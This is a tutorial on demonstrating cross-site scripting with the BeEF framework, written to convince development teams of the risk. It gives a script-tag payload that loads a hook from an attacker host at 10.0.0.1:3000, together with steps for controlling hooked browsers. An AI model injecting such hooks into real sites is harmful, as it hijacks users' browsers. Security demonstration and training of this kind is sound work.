Cross-site Scripting with BeEF Framework


Overview

Cross-site scripting and HTML injection may occcur when user or attacker controlled input is later incorporated without being encoded into the web server response. In other words, the attacker can send input which later is incorporated into the web page the user receives.

Development teams or management might not understand why XSS is such a big deal. Trivial demonstrations such as popping up an alert box do not help in these cases. The Browser Exploitation Framework (BeEF) allows remote control of injected browser making demonstration easy, effective and convincing.

Starting BeEF

  • In the attacker machine, open a command prompt
  • Start beef. For example in Samurai command is "beef".
  • If unsure of where the beef program is located, the "locate beef" command may help
  • Once BeEF starts carefully note the "Hook URL" and the "UI URL"
  • The "Hook URL" will be embedded into the cross-site script sent to the user. Save this URL for later.
  • BeEF starts a web server running. The "UI URL" is the URL to the administrative console set up by BeEF. Open a browser on the attacker host and paste the "UI URL". The BeEF administrative console will load as a web page. Login using "beef" as both the user name and password.

Using BeEF
  • Verify the "Hook URL" works. This can be done on the attacker machine. Simply open a web browser and paste the "Hook URL". Verify the contents of the BeEF JavaScript hook.js is visible. It is quite lengthly and will be obvious.
  • Create a cross-site script with the "Hook URL" as the value of the "src" (source) attribute.
    • <script src="BEEF HOOK URL GOES HERE"></script>
  • An example is
    • <script src="http://10.0.0.1:3000/hook.js"></script>
  • Inject this cross-site script into a vulerable input parameter
  • The browser will download and run hook.js from the attacker host infecting the browser. The hook.js causes the browser to reach out to the attacker machine and connect to the BeEF administrative console

Controlling Hooked Browsers
  • Look under "Hooked Browsers" in the BeEF interface. Currently hooked browsers appear as Online
  • Click on a hooked browser to display options
  • Commands are listed under Commands tab. Commands that are most likely to work have green marker
  • To execute a command click command then "Execute". Note some commands have parameters
  • Execute button is in lower right corner
  • Command output can be viewed by clicking the respective record in the "Module Result History" tab